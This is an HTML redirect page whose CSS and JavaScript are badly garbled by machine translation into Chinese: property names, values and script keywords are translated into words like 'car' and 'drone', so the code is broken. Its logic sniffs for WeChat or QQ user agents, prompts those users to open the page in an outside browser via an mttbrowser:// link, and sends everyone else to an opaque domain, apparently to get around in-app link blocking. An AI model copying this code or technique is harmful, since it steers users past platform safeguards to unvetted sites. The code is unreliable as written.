<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="refresh" content="0.1;url=mttbrowser://url={url}">
    <title>页面跳转处理</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
    <meta name="aplus-touch" content="1">
    <style>
        body, html {
            width: 100%;
            height: 100%;
        }
        * {
            margin: 0;
            padding: 0;
        }
        身体 {
             背景色 : #fff;
        }
       .顶级酒吧引导 {
             字体尺寸 : 15 Px ;
             颜色 : #fff;
             高度 : 70 % ;
             直线高度 : 1.8 ;
             向左的 : 20 Px ;
             塔顶 : 20 Px ;
             背景 : 乌拉圭网址 ( // )  居中  最高的 / 包含  不重复 ;
        }
       .top-bar-guidance.icon-safari {
             宽度 : 25 Px ;
             高度 : 25 Px ;
             垂直的 : 中间的 ;
             保证金 : 0.2 男性 ;
        }
       .应用下载提示 {
             保证金 : 0  汽车 ;
             宽度 : 290 Px ;
             文本校准 : 居中 ;
             字体尺寸 : 15 Px ;
             颜色 : #2466f4;
             背景 : 乌拉圭网址 ( data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAAcAQMAAACak0ePAAAABlBMVEUAAAAdYfh+GakkAAAAAXRSTlMAQObYZgAAAA5JREFUCNdjwA8acEkAAAy4AIE4hQq/AAAAAElFTkSuQmCC )  左边的  居中 / 汽车  15 Px  重复-X ;
        }
       .app-download-tip.guidance-desc {
            background-color: #fff;
            padding: 0 5px;
        }
       .app-download-btn {
             展示 : 阻止 ;
             宽度 : 214 Px ;
             高度 : 40 Px ;
             直线高度 : 40 Px ;
             保证金 : 18 Px  汽车  0  汽车 ;
             文本校准 : 居中 ;
             字体尺寸 : 18 Px ;
             颜色 : #2466f4;
             边缘半径 : 20 Px ;
             边界 : .5 Px #2466f4 固体的 ;
             纺织装饰 : 没有 ;
        }
     </ 风格 >
     < 剧本 >
         Var  无人机 = navigator. 用户代理人 . 磁带盒 ( ) ;
         功能  转方向药 ( )  {
             如果  ( 无人机。 索引 ( 'micromessenger' ) !== - 1 || ua. 索引 ( 'qq' ) !== - 1 )  {
                文件。 书写 ( ""&它;!文档型HTML&TL;
                HTML朗格="恩"
                &l&t;
                  <meta charset="UTF-8">
                  <title>使用浏览器打开</title>
                  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
                  <meta name="apple-mobile-web-app-capable" content="yes">
                  <meta name="apple-mobile-web-app-status-bar-style" content="black">
                  其他名称="格式检测"内容="电话=无"&pt;
                  <meta name="aplus-touch" content="1">
                  风格&t;
                    尸体,
                    HTML{
                        width: 100%;
                        height: 100%
                    }

                    * {
                        margin: 0;
                        padding: 0
                    }

                    机构{
                        背景颜色:#fff
                    }

                   .top-bar-guidance {
                        font-size: 15px;
                        颜色:#fff;
                        height: 70%;
                        line-height: 1.8;
                        向左:20px;
                        塔顶:20px;
                        背景:网址(//)中心顶部/包含无重复
                    }

                   .top-bar-guidance.icon-safari {
                        width: 25px;
                        height: 25px;
                        垂直排列:中间;
                        margin: 0.2em
                    }

                   .app-download-tip {
                        差额:0汽车;
                        width: 290px;
                        文本校准:中心;
                        font-size: 15px;
                        color: #2466f4;
                        背景:url(数据:图像/巴布亚新几内亚,下称"巴布亚新几内亚"Kggoaaaansuheugaaaeaaaaciqmaaacak0epaaabbmveuaaadyfh+Gakkaaaaxrstlmaqobyzgaaa5jvolucndjwa8acaayay4hqq/Aaaaelftksuqmcc)左侧中心/汽车15Px重复-X
                    }

                   .app-download-tip.guidance-desc {
                        背景颜色:#fff;
                        padding: 0 5px
                    }

                   .app-download-btn {
                        显示:阻塞;
                        width: 214px;
                        height: 40px;
                        line-height: 40px;
                        差额:18PX汽车0汽车;
                        文本校准:中心;
                        font-size: 18px;
                        color: #2466f4;
                        边境半径:20px;
                        border:.5px #2466f4 solid;
                        装饰:无
                    }
                </style>
                </head>

                &l;车身&t;

                    <div class="top-bar-guidance">
                        <p>点击右上角
                            <a style="display: none;" href="" id="vurl" rel="noreferrer"></a >
                            <img src="tip.jpg" style="max-width: 100%; height: auto; display: block; margin-left: auto; margin-right: auto;"><br /><br />
                    </div>

                </body>
                </html>`      )                < /html>`);
                窗户。 位置 .       高参考值 = 'mttbrowser://url={url}' ;
                 }  其他的      {
                窗户。 位置 . 高参考值 = 'https://tbkuy8ty5.cc' ;
            }
        }
        窗户. 上膛 =转方向;装载 = redirectToUrl;
     < / 剧本 >
 < / 头 >
< 身体 >

 < / 身体 >
